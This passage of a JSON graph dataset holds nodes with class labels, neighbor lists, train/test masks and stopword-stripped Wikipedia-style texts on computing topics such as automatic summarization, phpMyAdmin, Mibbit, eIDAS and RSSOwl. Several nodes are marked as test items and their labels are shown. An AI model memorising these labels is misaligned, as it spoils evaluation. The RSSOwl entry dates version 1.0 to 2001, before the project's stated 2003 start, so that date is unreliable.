      5492,
      2485,
      823,
      4797,
      5470
    ],
    "mask": "None"
  },
  {
    "node_id": 5197,
    "label": 0,
    "text": "Automatic_summarization:automatic summarization automatic summarization process shortening text document software order create summary major points original document technologies make coherent summary take account variables length writing style syntax automatic data summarization part machine learning data mining main idea summarization find subset data contains information entire set techniques widely used industry today search engines example others include summarization documents image collections videos document summarization tries create representative summary abstract entire document finding informative sentences image summarization system finds representative important i.e salient images surveillance videos one might want extract important events uneventful context two general approaches automatic summarization extraction abstraction extractive methods work selecting subset existing words phrases sentences original text form summary contrast abstractive methods build internal semantic representation use natural language generation techniques create summary closer human might express summary might include verbal innovations research date focused primarily extractive methods appropriate image collection summarization video summarization summarization task automatic system extracts objects entire collection without modifying objects examples include keyphrase extraction goal select individual words phrases tag document document summarization goal select whole sentences without modifying create short paragraph summary similarly image collection summarization system extracts images collection without modifying images extraction techniques merely copy information deemed important system summary example key clauses sentences paragraphs abstraction involves paraphrasing sections source document general abstraction condense text strongly extraction programs harder develop require use natural language generation technology growing field work done abstractive summarization creating abstract synopsis like human majority summarization systems extractive selecting subset sentences place summary machine learning techniques closely related fields information retrieval text mining successfully adapted help automatic summarization apart fully automated summarizers fas systems aid users task summarization mahs machine aided human summarization example highlighting candidate passages included summary systems depend post-processing human hams human aided machine summarization broadly two types extractive summarization tasks depending summarization program focuses first generic summarization focuses obtaining generic summary abstract collection whether documents sets images videos news stories etc. second query relevant summarization sometimes called query-based summarization summarizes objects specific query summarization systems able create query relevant text summaries generic machine-generated summaries depending user needs example summarization problem document summarization attempts automatically produce abstract given document sometimes one might interested generating summary single source document others use multiple source documents example cluster articles topic problem called multi-document summarization related application summarizing news articles imagine system automatically pulls together news articles given topic web concisely represents latest news summary image collection summarization another application example automatic summarization consists selecting representative set images larger set images summary context useful show representative images results image collection exploration system video summarization related domain system automatically creates trailer long video also applications consumer personal videos one might want skip boring repetitive actions similarly surveillance videos one would want extract important suspicious activity ignoring boring redundant frames captured high level summarization algorithms try find subsets objects like set sentences set images cover information entire set also called core-set algorithms model notions like diversity coverage information representativeness summary query based summarization techniques additionally model relevance summary query techniques algorithms naturally model summarization problems textrank pagerank submodular set function determinantal point process maximal marginal relevance mmr etc task following given piece text journal article must produce list keywords key phrase capture primary topics discussed text case research articles many authors provide manually assigned keywords text lacks pre-existing keyphrases example news articles rarely keyphrases attached would useful able automatically number applications discussed consider example text news article keyphrase extractor might select army corps engineers president bush new orleans defective flood-control pumps keyphrases pulled directly text contrast abstractive keyphrase system would somehow internalize content generate keyphrases appear text closely resemble human might produce political negligence inadequate protection floods abstraction requires deep understanding text makes difficult computer system keyphrases many applications enable document browsing providing short summary improve information retrieval documents keyphrases assigned user could search keyphrase produce reliable hits full-text search employed generating index entries large text corpus depending different literature definition key terms words phrases keyword extraction highly related theme beginning work turney many researchers approached keyphrase extraction supervised machine learning problem given document construct example unigram bigram trigram found text though text units also possible discussed compute various features describing example e.g. phrase begin upper-case letter assume known keyphrases available set training documents using known keyphrases assign positive negative labels examples learn classifier discriminate positive negative examples function features classifiers make binary classification test example others assign probability keyphrase instance text might learn rule says phrases initial capital letters likely keyphrases training learner select keyphrases test documents following manner apply example-generation strategy test documents run example learner determine keyphrases looking binary classification decisions probabilities returned learned model probabilities given threshold used select keyphrases keyphrase extractors generally evaluated using precision recall precision measures many proposed keyphrases actually correct recall measures many true keyphrases system proposed two measures combined f-score harmonic mean two f 2 pr p r matches proposed keyphrases known keyphrases checked stemming applying text normalization designing supervised keyphrase extraction system involves deciding several choices apply unsupervised first choice exactly generate examples turney others used possible unigrams bigrams trigrams without intervening punctuation removing stopwords hulth showed get improvement selecting examples sequences tokens match certain patterns part-of-speech tags ideally mechanism generating examples produces known labeled keyphrases candidates though often case example use unigrams bigrams trigrams never able extract known keyphrase containing four words thus recall may suffer however generating many examples also lead low precision also need create features describe examples informative enough allow learning algorithm discriminate keyphrases non- keyphrases typically features involve various term frequencies many times phrase appears current text larger corpus length example relative position first occurrence various boolean syntactic features e.g. contains caps etc turney paper used 12 features hulth uses reduced set features found successful kea keyphrase extraction algorithm work derived turney ’ seminal paper end system need return list keyphrases test document need way limit number ensemble methods i.e. using votes several classifiers used produce numeric scores thresholded provide user-provided number keyphrases technique used turney c4.5 decision trees hulth used single binary classifier learning algorithm implicitly determines appropriate number examples features created need way learn predict keyphrases virtually supervised learning algorithm could used decision trees naive bayes rule induction case turney genex algorithm genetic algorithm used learn parameters domain-specific keyphrase extraction algorithm extractor follows series heuristics identify keyphrases genetic algorithm optimizes parameters heuristics respect performance training documents known key phrases another keyphrase extraction algorithm textrank supervised methods nice properties like able produce interpretable rules features characterize keyphrase also require large amount training data many documents known keyphrases needed furthermore training specific domain tends customize extraction process domain resulting classifier necessarily portable turney results demonstrate unsupervised keyphrase extraction removes need training data approaches problem different angle instead trying learn explicit features characterize keyphrases textrank algorithm exploits structure text determine keyphrases appear central text way pagerank selects important web pages recall based notion prestige recommendation social networks way textrank rely previous training data rather run arbitrary piece text produce output simply based text intrinsic properties thus algorithm easily portable new domains languages textrank general purpose graph-based ranking algorithm nlp essentially runs pagerank graph specially designed particular nlp task keyphrase extraction builds graph using set text units vertices edges based measure semantic lexical similarity text unit vertices unlike pagerank edges typically undirected weighted reflect degree similarity graph constructed used form stochastic matrix combined damping factor random surfer model ranking vertices obtained finding eigenvector corresponding eigenvalue 1 i.e. stationary distribution random walk graph vertices correspond want rank potentially could something similar supervised methods create vertex unigram bigram trigram etc however keep graph small authors decide rank individual unigrams first step include second step merges highly ranked adjacent unigrams form multi-word phrases nice side effect allowing us produce keyphrases arbitrary length example rank unigrams find advanced natural language processing get high ranks would look original text see words appear consecutively create final keyphrase using four together note unigrams placed graph filtered part speech authors found adjectives nouns best include thus linguistic knowledge comes play step edges created based word co-occurrence application textrank two vertices connected edge unigrams appear within window size n original text n typically around 2–10 thus natural language might linked text nlp natural processing would also linked would appear string n words edges build notion text cohesion idea words appear near likely related meaningful way recommend reader since method simply ranks individual vertices need way threshold produce limited number keyphrases technique chosen set count user-specified fraction total number vertices graph top vertices/unigrams selected based stationary probabilities post- processing step applied merge adjacent instances unigrams result potentially less final keyphrases produced number roughly proportional length original text initially clear applying pagerank co-occurrence graph would produce useful keyphrases one way think following word appears multiple times throughout text may many different co-occurring neighbors example text machine learning unigram learning might co-occur machine supervised un-supervised semi-supervised four different sentences thus learning vertex would central hub connects modifying words running pagerank/textrank graph likely rank learning highly similarly text contains phrase supervised classification would edge supervised classification classification appears several places thus many neighbors importance would contribute importance supervised ends high rank selected one top unigrams along learning probably classification final post-processing step would end keyphrases supervised learning supervised classification short co-occurrence graph contain densely connected regions terms appear often different contexts random walk graph stationary distribution assigns large probabilities terms centers clusters similar densely connected web pages getting ranked highly pagerank approach also used document summarization considered like keyphrase extraction document summarization aims identify essence text real difference dealing larger text units—whole sentences instead words phrases getting details summarization methods mention summarization systems typically evaluated common way using so-called rouge recall-oriented understudy gisting evaluation measure recall-based measure determines well system-generated summary covers content present one human-generated model summaries known references recall-based encourage systems include important topics text recall computed respect unigram bigram trigram 4-gram matching example rouge-1 computed division count unigrams reference appear system count unigrams reference summary multiple references rouge-1 scores averaged rouge based content overlap determine general concepts discussed automatic summary reference summary determine result coherent sentences flow together sensible manner high-order n-gram rouge measures try judge fluency degree note rouge similar bleu measure machine translation bleu precision- based translation systems favor accuracy promising line document summarization adaptive document/text summarization idea adaptive summarization involves preliminary recognition document/text genre subsequent application summarization algorithms optimized genre first summarizes perform adaptive summarization created supervised text summarization much like supervised keyphrase extraction basically collection documents human-generated summaries learn features sentences make good candidates inclusion summary features might include position document i.e. first sentences probably important number words sentence etc main difficulty supervised extractive summarization known summaries must manually created extracting sentences sentences original training document labeled summary summary typically people create summaries simply using journal abstracts existing summaries usually sufficient sentences summaries necessarily match sentences original text would difficult assign labels examples training note however natural summaries still used evaluation purposes since rouge-1 cares unigrams duc 2001 2002 evaluation workshops tno developed sentence extraction system multi-document summarization news domain system based hybrid system using naive bayes classifier statistical language models modeling salience although system exhibited good results researchers wanted explore effectiveness maximum entropy classifier meeting summarization task known robust feature dependencies maximum entropy also applied successfully summarization broadcast news domain unsupervised approach summarization also quite similar spirit unsupervised keyphrase extraction gets around issue costly training data unsupervised summarization approaches based finding centroid sentence mean word vector sentences document sentences ranked regard similarity centroid sentence principled way estimate sentence importance using random walks eigenvector centrality lexrank algorithm essentially identical textrank use approach document summarization two methods developed different groups time lexrank simply focused summarization could easily used keyphrase extraction nlp ranking task lexrank textrank graph constructed creating vertex sentence document edges sentences based form semantic similarity content overlap lexrank uses cosine similarity tf-idf vectors textrank uses similar measure based number words two sentences common normalized sentences lengths lexrank paper explored using unweighted edges applying threshold cosine values also experimented using edges weights equal similarity score textrank uses continuous similarity scores weights algorithms sentences ranked applying pagerank resulting graph summary formed combining top ranking sentences using threshold length cutoff limit size summary worth noting textrank applied summarization exactly described lexrank used part larger summarization system mead combines lexrank score stationary probability features like sentence position length using linear combination either user-specified automatically tuned weights case training documents might needed though textrank results show additional features absolutely necessary another important distinction textrank used single document summarization lexrank applied multi-document summarization task remains cases—only number sentences choose grown however summarizing multiple documents greater risk selecting duplicate highly redundant sentences place summary imagine cluster news articles particular event want produce one summary article likely many similar sentences would want include distinct ideas summary address issue lexrank applies heuristic post-processing step builds summary adding sentences rank order discards sentences similar ones already placed summary method used called cross-sentence information subsumption csis methods work based idea sentences recommend similar sentences reader thus one sentence similar many others likely sentence great importance importance sentence also stems importance sentences recommending thus get ranked highly placed summary sentence must similar many sentences turn also similar many sentences makes intuitive sense allows algorithms applied arbitrary new text methods domain-independent easily portable one could imagine features indicating important sentences news domain might vary considerably biomedical domain however unsupervised recommendation -based approach applies domain multi-document summarization automatic procedure aimed extraction information multiple texts written topic resulting summary report allows individual users professional information consumers quickly familiarize information contained large cluster documents way multi-document summarization systems complementing news aggregators performing next step road coping information overload multi-document summarization may also done response question multi-document summarization creates information reports concise comprehensive different opinions put together outlined every topic described multiple perspectives within single document goal brief summary simplify information search cut time pointing relevant source documents comprehensive multi-document summary contain required information hence limiting need accessing original files cases refinement required automatic summaries present information extracted multiple sources algorithmically without editorial touch subjective human intervention thus making completely unbiased multi-document extractive summarization faces problem potential redundancy ideally would like extract sentences central i.e. contain main ideas diverse i.e. differ one another lexrank deals diversity heuristic final stage using csis systems used similar methods maximal marginal relevance mmr trying eliminate redundancy information retrieval results general purpose graph-based ranking algorithm like page/lex/textrank handles centrality diversity unified mathematical framework based absorbing markov chain random walks absorbing random walk like standard random walk except states absorbing states act black holes cause walk end abruptly state algorithm called grasshopper addition explicitly promoting diversity ranking process grasshopper incorporates prior ranking based sentence position case summarization state art results multi-document summarization however obtained using mixtures submodular functions methods achieved state art results document summarization corpora duc 04 07 similar results also achieved use determinantal point processes special case submodular functions duc-04 new method multi-lingual multi-document summarization avoids redundancy works simplifying generating ideograms represent meaning sentence document evaluates similarity qualitatively comparing shape position said ideograms recently developed tool use word frequency need training preprocessing kind works generating ideograms represent meaning sentence summarizes using two user-supplied parameters equivalence two sentences considered equivalent relevance long desired summary simplish simplifying summarizing tool performs automatic multi-lingual multi-document summarization idea submodular set function recently emerged powerful modeling tool various summarization problems submodular functions naturally model notions coverage information representation diversity moreover several important combinatorial optimization problems occur special instances submodular optimization example set cover problem special case submodular optimization since set cover function submodular set cover function attempts find subset objects cover given set concepts example document summarization one would like summary cover important relevant concepts document instance set cover similarly facility location problem special case submodular functions facility location function also naturally models coverage diversity another example submodular optimization problem using determinantal point process model diversity similarly maximum-marginal-relevance procedure also seen instance submodular optimization important models encouraging coverage diversity information submodular moreover submodular functions efficiently combined together resulting function still submodular hence one could combine one submodular function models diversity another one models coverage use human supervision learn right model submodular function problem submodular functions fitting problems summarization also admit efficient algorithms optimization example simple greedy algorithm admits constant factor guarantee moreover greedy algorithm extremely simple implement scale large datasets important summarization problems submodular functions achieved state-of-the-art almost summarization problems example work lin bilmes 2012 shows submodular functions achieve best results date duc-04 duc-05 duc-06 duc-07 systems document summarization similarly work lin bilmes 2011 shows many existing systems automatic summarization instances submodular functions breakthrough result establishing submodular functions right models summarization problems submodular functions also used summarization tasks tschiatschek et al. 2014 show mixtures submodular functions achieve state-of-the-art results image collection summarization similarly bairi et al. 2015 show utility submodular functions summarizing multi-document topic hierarchies submodular functions also successfully used summarizing machine learning datasets specific applications automatic summarization include common way evaluate informativeness automatic summaries compare human-made model summaries evaluation techniques fall intrinsic extrinsic inter-textual intra-textual intrinsic evaluation tests summarization system extrinsic evaluation tests summarization based affects completion task intrinsic evaluations assessed mainly coherence informativeness summaries extrinsic evaluations hand tested impact summarization tasks like relevance assessment reading comprehension etc intra-textual methods assess output specific summarization system inter-textual ones focus contrastive analysis outputs several summarization systems human judgement often wide variance considered good summary means making evaluation process automatic particularly difficult manual evaluation used time labor-intensive requires humans read summaries also source documents issues concerning coherence coverage one metrics used nist annual document understanding conferences research groups submit systems summarization translation tasks rouge metric recall-oriented understudy gisting evaluation essentially calculates n-gram overlaps automatically generated summaries previously-written human summaries high level overlap indicate high level shared concepts two summaries note overlap metrics like unable provide feedback summary coherence anaphor resolution remains another problem yet fully solved similarly image summarization tschiatschek et al. developed visual-rouge score judges performance algorithms image summarization domain independent summarization techniques generally apply sets general features used identify information-rich text segments recent research focus drifted domain-specific summarization techniques utilize available knowledge specific domain text example automatic summarization research medical text generally attempts utilize various sources codified medical knowledge ontologies main drawback evaluation systems existing far need least one reference summary methods one able compare automatic summaries models hard expensive task much effort done order corpus texts corresponding summaries furthermore methods need human-made summaries available comparison also manual annotation performed e.g scu pyramid method case evaluation methods need input set summaries serve gold standards set automatic summaries moreover perform quantitative evaluation regard different similarity metrics",
    "neighbors": [
      5122,
      2440,
      2059,
      6798,
      11538,
      1044,
      5781,
      5399,
      538,
      416,
      11425,
      3748,
      10794,
      8748,
      7599,
      4531,
      4662,
      3127,
      2488,
      10557,
      6208,
      11206,
      3533,
      6223,
      8538,
      10847,
      5857,
      7780,
      6374,
      7918,
      8046,
      8688,
      10231,
      8440,
      7164
    ],
    "mask": "Test"
  },
  {
    "node_id": 5198,
    "label": 1,
    "text": "PhpMyAdmin:phpmyadmin phpmyadmin free open source administration tool mysql mariadb portable web application written primarily php become one popular mysql administration tools especially web hosting services tobias ratschiller consultant later founder software company maguma started work php-based web front-end mysql 1998 inspired mysql-webadmin gave project phpadsnew also original author 2000 lack time time phpmyadmin already become one popular php applications mysql administration tools large community users contributors order coordinate growing number patches group three developers olivier müller marc delisle loïc chapeaux registered phpmyadmin project sourceforge took development 2001 july 2015 main website downloads left sourceforge moved content delivery network time releases began pgp-signed afterwards issue tracking moved github mailing lists migrated version 4 uses ajax extensively enhance usability software used html frames features provided program include",
    "neighbors": [
      11392,
      8195,
      3462,
      1929,
      1802,
      10254,
      10258,
      7453,
      1950,
      9503,
      7339,
      10413,
      7983,
      9010,
      6721,
      5827,
      8644,
      5964,
      7506,
      9687,
      9177,
      9562,
      8539,
      10459,
      479,
      6245,
      8295,
      8683,
      5612,
      2413,
      3182,
      7022,
      3188,
      888,
      10873,
      2810
    ],
    "mask": "Test"
  },
  {
    "node_id": 5199,
    "label": 8,
    "text": "Mibbit:mibbit mibbit web-based client web browsers supports internet relay chat irc yahoo messenger twitter developed jimmy moore designed around ajax model user interface written javascript irc application setup default firefox mibbit user interface operates entirely within web browser require installation software user computer modern web browsers support recent versions javascript supported including mozilla firefox internet explorer opera google chrome safari mobile devices apple iphone ipod touch nokia n800 platforms nintendo wii also supported unlike typical web-based irc clients mibbit makes use client–server design model user interface written html javascript using ajax programming techniques client backend written completely java operates independently web server standalone fashion mibbit server design differs web browser component clients chatzilla java applet based irc clients pjirc operate entirely within web browser also differs server-based web proxy irc clients processing takes place remote server client–server design allows centralized mibbit client server mibbit able offer extended functionality present standard irc protocol extensions include channel chat buffer shown mibbit clients join channel another mibbit user already present notification mibbit users typing message distinctive icons allow identification device used mibbit iphone ipod touch wii etc mibbit supports webirc cgiirc protocol allows client send user ip address hostname irc server servers support webirc allow mibbit users appear regular irc clients instead appearing connect mibbit.com domain webirc used unavailable mibbit puts user hostname client realname field encodes user ip address hexadecimal sends ident reply mibbit client ability connect multiple irc servers including servers use ssl/tls join multiple channels configured auto-join often used channels mibbit uses utf-8 character set default also configured use character sets supports nickname tab auto-completion input history tab accessible up/down arrow keys aliases user menu commands saving user preferences mibbit parse smilies links channels nicks mirc color codes automatically create thumbnails image links urls addition mibbit offers integrated pastebin upload service minify urls mibbit also offers typing notification mibbit users recent chat buffer irc channels mibbit users already channel extended whois information user profiles mibbit supports google api allows client support number google services mibbit translate text conversations fly using google translate mibbit also display geographic locations using google maps supports viewing youtube videos addition standard client mibbit also supports widget client embedded web page widget client supports features regular client support multiple server connections mibbit praised cnet lifehacker ease use drupal administrators use add irc widgets sites noting benefits modular design mashable suggests mibbit appropriate resource new irc firefox 3.5 beyond builds already support mibbit default irc protocol handler support encrypted ircs // ssl/tls connections also included mibbit effectively irc proxy potential abused used evade bans blocks resulted client banned accessing irc networks channels mibbit supports dnsbl checking via dronebl service means help block access abusive users botnets mibbit listed open proxy dronebl dns blacklist december 2008 due database glitch mistakenly listed march 2009 prevented mibbit users connecting irc networks make use dronebl service mibbit added dronebl whitelist help prevent future service disruptions june 19 2009 banned permanently freenode new officially supported open-source ajax client introduced",
    "neighbors": [
      5760,
      1537,
      5251,
      9732,
      3462,
      8584,
      1802,
      4490,
      6797,
      4883,
      5397,
      8224,
      5677,
      7861,
      1346,
      5316,
      2387,
      3030,
      5591,
      5078,
      7384,
      225,
      2409,
      5612,
      2804,
      4725
    ],
    "mask": "None"
  },
  {
    "node_id": 5200,
    "label": 4,
    "text": "EIDAS:eidas eidas electronic identification authentication trust services eu regulation set standards electronic identification trust services electronic transactions european single market established eu regulation 910/2014 23 july 2014 electronic identification repeals directive 1999/93/ec 13 december 1999 entered force 17 september 2014 applies 1 july 2016 except certain articles listed article 52 organizations delivering public digital services eu member state must recognize electronic identification eu member states september 29 2018. eidas oversees electronic identification trust services electronic transactions european union internal market regulates electronic signatures electronic transactions involved bodies embedding processes provide safe way users conduct business online like electronic funds transfer transactions public services signatory recipient convenience security instead relying traditional methods mail facsimile appearing person submit paper-based documents may perform transactions across borders like 1-click technology eidas created standards electronic signatures qualified digital certificates electronic seals timestamps proof authentication mechanisms enable electronic transactions legal standing transactions performed paper regulation came effect july 2014 means facilitate secure seamless electronic transactions within european union member states required recognise electronic signatures meet standards eidas eidas result european commission focus europe digital agenda commission oversight eidas implemented spur digital growth within eu intent eidas drive innovation adhering guidelines set technology eidas organisations pushed towards using higher levels information security innovation additionally eidas focuses following regulation provides regulatory environment following important aspects related electronic transactions eidas regulation evolved directive 1999/93/ec set goal eu member states expected achieve regards electronic signing regulation became directly binding law throughout eu july 1 2016 directive made eu member states responsible creating laws would allow meet goal creating electronic signing system within eu directive also allowed member state interpret law impose restrictions thus preventing real interoperability leading toward fragmented scenario contrast directive eidas ensures mutual recognition eid authentication among member states thus achieving goal digital single market eidas provides tiered approach legal value requires electronic signature denied legal effect admissibility court solely advanced qualified electronic signature qualified electronic signatures must given legal effect handwritten signatures electronic seals legal entities version signatures probative value explicitly addressed seals enjoy presumption integrity correctness origin attached data database information linked kind identity number certify person right access personal information involves several steps eidas minimum identity concept name birth date order access sensitive information kind certification needed identity numbers issued two countries refer person",
    "neighbors": [
      3264,
      2948,
      9576,
      5674,
      1836,
      9901,
      2286,
      4015,
      9744,
      8018,
      1496,
      5433,
      8859,
      5373,
      10046,
      3231
    ],
    "mask": "None"
  },
  {
    "node_id": 5201,
    "label": 2,
    "text": "Nokia_phone_series:nokia phone series nokia strategic nomenclature traced back 2005 nseries line launched offering devices flagship specifications premium hardware various price points devices considered bread butter company often positioned showcase latest technologies thanks newfound consumer enterprise interest smartphones time company introduced four additional collections diversify product portfolio meet demands market segments new phone series named eseries targeting small business enterprise customers xseries providing consumer-grade multimedia-focused devices cseries nokia used target low-end mid-range market segments tseries devices exclusive chinese market nokia nseries multimedia smartphone tablet product family served company flagship portfolio aimed users looking pack many features possible one device nokia eseries stands executive consists business-oriented smartphones emphasis enhanced connectivity support corporate e-mail push services phones enterprise market list may also include upcoming devices others previously intended part series scrapped renamed due nokia number-only naming change phones included series nokia xseries stands xpress younger users phones included line feature phones smartphones include features focusing social entertainment music special dedicated keys inbuilt storage facilities succeeded nokia xpressmusic brand phones list may also include upcoming devices others previously intended part series scrapped renamed due nokia number-only naming change phones included series nokia cseries stands core nokia calls core range products offering different phones low-end high-end various markets list may also include upcoming devices others previously intended part series scrapped renamed due nokia number-only naming change phones included series nokia zseries stands zuper supposed nokia meego tablet series originally intended released 2010 early 2011 tablets cancelled unknown reasons product name revealed ovi store november 2010 list may also include upcoming devices others previously intended part series scrapped renamed due nokia number-only naming change tablets included series nokia tseries stands time china-specific line phones made cater services offered china technologies web features disabled replaced country proprietary inventions instance phones offered series would include td-scdma ev-do networks dominant marketplace line launched 13 june 2011 chinese version nokia conversations blog list may also include upcoming devices phones included series nokia aseries stands asha means hope feature-phone line introduced nokia nokia world 2011 phones series developing markets younger users messaging connectivity list may also include upcoming devices phones included series nokia lseries stands lumia means light series smartphones originally made nokia using windows phone operating system officially unveiled nokia world 2011 created exclusive partnership february year allow nokia use modify microsoft mobile operating system devices come host nokia-exclusive services microsoft purchased nokia devices services division april 2014 since lumia series manufactured exclusively microsoft subsidiary microsoft mobile initially retaining nokia branding later dropped favor microsoft first generation phones series include nokia lumia 510 nokia lumia 610 nokia lumia 710 nokia lumia 800 nokia lumia 900 run windows phone 7 subsequent generations use windows phone 8 windows phone 8.1 full list devices found microsoft lumia list lumia devices",
    "neighbors": [
      1537,
      8577,
      6276,
      3205,
      11655,
      9359,
      1424,
      529,
      2449,
      8083,
      10770,
      5143,
      2072,
      7063,
      5274,
      5019,
      5659,
      669,
      8472,
      11545,
      2208,
      4003,
      4132,
      6310,
      167,
      40,
      3626,
      5290,
      10410,
      5938,
      10802,
      7220,
      821,
      5175,
      5178,
      7866,
      2492,
      1216,
      1728,
      7617,
      4291,
      7877,
      10053,
      199,
      967,
      9292,
      7246,
      1615,
      4305,
      2259,
      6996,
      7253,
      854,
      6870,
      10583,
      5211,
      6748,
      1121,
      1633,
      9443,
      3300,
      4324,
      7399,
      8423,
      6505,
      10599,
      109,
      5998,
      8433,
      5875,
      1533
    ],
    "mask": "Test"
  },
  {
    "node_id": 5202,
    "label": 7,
    "text": "Cloud_collaboration:cloud collaboration cloud collaboration way sharing co-authoring computer files use cloud computing whereby documents uploaded central cloud storage accessed others cloud collaboration technologies allow users upload comment collaborate documents even amend document evolving document businesses last years increasingly switching use cloud collaboration cloud computing marketing term technologies provide software data access storage services require end-user knowledge physical location configuration system delivers services parallel concept drawn electricity grid end-users consume power without needing understand component devices infrastructure required utilize technology collaboration refers ability workers work together simultaneously particular task document collaboration completed face face however collaboration become complex need work people world real time variety different types documents using different devices 2003 report mapped five reasons workers reluctant collaborate result many providers created cloud collaboration tools include integration email alerts collaboration software ability see viewing document time tools team could need put one piece software workers longer rely email cloud file sharing collaboration software collaboration limited primitive less effective methods email ftp among others work particularly well early moves cloud computing made amazon web services 2006 began offering infrastructure services businesses form web services cloud computing began come prominence 2007 google decided move parts email service public cloud long ibm microsoft followed suit lotuslive business productivity online standard suite bpos respectively increase cloud computing services cloud collaboration able evolve since 2007 many firms entered industry offering many features many analysts explain rise cloud collaboration pointing increasing use workers non-authorised websites online tools jobs includes use instant messaging social networks survey taken early 2011 22 workers admitted used one external non-authorised websites cloud collaboration packages provide ability collaborate documents together real time making use non-authorised instant messaging redundant managers properly regulate internet based collaboration system tailor made office also noted cloud collaboration become necessary departments workforces become mobile need access important documents wherever whether internet browser newer technologies smartphones tablet devices tech industry saw several large paradigm changes revolutions brought new economies scale cost-per-transaction cost automating office desktop processes finally cost network bandwidth fell quickly enabled business users apply ict solutions broadly create business value analysts forrester gartner etc believe cloud computing help unleash next wave tech-enabled business innovation mainframe era client/server initially viewed toy technology viable mainframe replacement yet time client/server technology found way enterprise similarly virtualization technology first proposed application compatibility concerns potential vendor lock-in cited barriers adoption yet underlying economics 20 30 percent savings compelled cios overcome concerns adoption quickly accelerated early cloud collaboration tools quite basic limited features newer packages much document-centric approach collaboration sophisticated tools allow users tag specific areas document comments delivered real time viewing document cases collaboration software even integrated microsoft office allow users set video conferences furthermore trend firms employ single software tool solve collaboration needs rather rely multiple different techniques single cloud collaboration providers replacing complicated tangle instant messengers email ftp cloud collaboration today promoted tool collaboration internally different departments within firm also externally means sharing documents end-clients receiving feedback makes cloud computing versatile tool firms many different applications business environment best cloud collaboration tools 2011 report gartner outlines five stage model maturity firms comes uptake cloud collaboration tools firm first stage said reactive email collaboration platform culture resists information sharing firm fifth stage called pervasive universal access rich collaboration toolset strong collaborative culture article argues firms second stage cloud collaboration becomes important analysts expect see majority firms moving model",
    "neighbors": [
      2432,
      1801,
      4236,
      10893,
      911,
      1935,
      4623,
      8592,
      5499,
      2965,
      2328,
      4377,
      8986,
      2720,
      9632,
      6307,
      8998,
      5159,
      9766,
      6444,
      8495,
      3121,
      3633,
      8117,
      11190,
      7352,
      10168,
      1083,
      3388,
      2496,
      4289,
      1602,
      7364,
      1224,
      8520,
      4429,
      7248,
      1362,
      467,
      9682,
      6367,
      4194,
      11646,
      5732,
      8934,
      10090,
      3819,
      7660,
      11117,
      2170,
      3323,
      253,
      8446
    ],
    "mask": "None"
  },
  {
    "node_id": 5203,
    "label": 8,
    "text": "Parse.ly:parse.ly parse.ly technology company provides web analytics content optimization software online publishers parse.ly built three products parse.ly reader parse.ly publisher platform latest parse.ly dash analytics tool large publishers parse.ly content optimization platform online publishers parse.ly product dash built top parse.ly platform dash parses articles publisher site analyzes identify data around metrics specific publishers topics authors sections referrers technology uses natural language processing extracted 350,000 unique topics urls crawled addition providing site analytics dash show users topics resonating people across web webwide trends interface parse.ly founded sachin kamdar andrew montalenti dreamit ventures early stage startup accelerator program philadelphia launched first product parse.ly reader september 2009 may 2009 parse.ly received 20k seed funding dreamit ventures december 2010 parse.ly received 1.8m series funding blumberg capital ff venture capital scott becker cofounder invite media hutchison jonathan axelrod jeffrey greenblatt august 2017 parse.ly received series b funding round 6.8 million round led grotech investors blumberg capital",
    "neighbors": [
      6576,
      7780,
      6701
    ],
    "mask": "Test"
  },
  {
    "node_id": 5204,
    "label": 9,
    "text": "P′′:p′′ p′′ p double prime primitive computer programming language created corrado böhm 1964 describe family turing machines formula_1 hereinafter written p′′ formally defined set words four-instruction alphabet formula_2 follows böhm gives following program compute predecessor x -1 integer x 0 translates directly equivalent brainfuck program program expects integer represented bijective base-k notation formula_39 encoding digits formula_40 respectively formula_11 digit-string e.g. bijective base-2 number eight would encoded formula_42 8 bijective base-2 112 beginning end computation tape-head formula_11 preceding digit-string",
    "neighbors": [
      9345,
      2619,
      8262,
      7395
    ],
    "mask": "None"
  },
  {
    "node_id": 5205,
    "label": 5,
    "text": "RSSOwl:rssowl rssowl news aggregator rss atom news feeds written java built eclipse rich client platform uses swt widget toolkit allow fit look feel different operating systems remaining cross-platform released eclipse public license rssowl free software addition full text searches saved searches notifications filters rssowl v2.1 synchronized discontinued google reader rssowl began small project sourceforge end july 2003 first public version 0.3a rssowl 1.0 released december 19 2001 released support rss atom news feeds initial release also supported exporting feeds pdf rtf html release available windows mac linux solaris rssowl 1.1 added support toolbars quicksearch news feeds version 1.2 improved toolbar customization added support atom 1.0 news feeds versions 1.2.1 1.2.2 added universal binary support mac well drag drop tabs built feed validator rssowl sourceforge project month january 2005 rssowl 2.0 announced march 7 2007 eclipsecon 2007 version 2.0 rebuilt eclipse rich client platform used db4o database storage lucene text searching several milestone versions released final 2.0 version added labeling news feeds pop-up notification new feeds storage news articles news bins final 2.0 version released milestone 9 added support secure password credential storage news filters support embedding firefox 3.0 xulrunner render news feeds proxy support windows rssowl 2.1 released july 15 2011 google reader synchronization support new layouts rssowl longer maintained original developer however maintained fork available known rssowlnix rssowl translated many languages bengali bulgarian czech chinese simplified chinese traditional danish dutch english finnish french galician german greek hungarian italian japanese korean norwegian polish portuguese russian serbian cyrillic serbian latin slovenian spanish swedish thai turkish ukrainian",
    "neighbors": [
      1664,
      3971,
      8584,
      4490,
      10126,
      11418,
      2076,
      1834,
      4013,
      5677,
      559,
      7983,
      9908,
      7488,
      10057,
      4310,
      5078,
      6231,
      6237,
      10722,
      2149,
      5605,
      8169,
      9451,
      5612,
      8557,
      11000,
      5114
    ],
    "mask": "Test"
  },
  {
    "node_id": 5206,
    "label": 6,
    "text": "CacheFS:cachefs cachefs name used several similar software technologies designed speed distributed file system file access networked computers technologies operate storing cached copies files secondary memory typically local hard disk file accessed done locally much higher speeds networks typically allow cachefs software used several unix-like operating systems original unix version developed sun microsystems 1993 another version written linux released 2003 network filesystems dependent network link remote server obtaining file filesystem significantly slower getting file locally reason desirable cache data filesystems local disk thus potentially speeding future accesses data avoiding need go network fetch software check remote file changed since cached much faster reading whole file sprite operating system used large disk block caches located main-memory achieve high performance file system term cachefs found little use describe caches main memory first cachefs implementation 6502 assembler write cache developed mathew r mathews grossmont college used fall 1986 spring 1990 three diskless 64 kb main memory apple iie computers cache files nestar file server onto big board 1 mb dram secondary memory device partitioned cachefs tmpfs computers ran pineapple dos apple dos 3.3 derivative developed course follow wr bornhorst nsf funded instructional computing system pineapple dos features including caching unnamed name cachefs introduced seven years later sun microsystems first unix cachefs implementation developed sun microsystems released solaris 2.3 operating system release 1993 part expanded feature set nfs network file system suite known open network computing plus onc+ subsequently used unix operating systems irix starting 5.3 release 1994 linux operating systems commonly use new version cachefs developed david howells howells appears rewritten cachefs scratch using sun original code linux cachefs currently designed operate andrew file system network file system filesystems similar 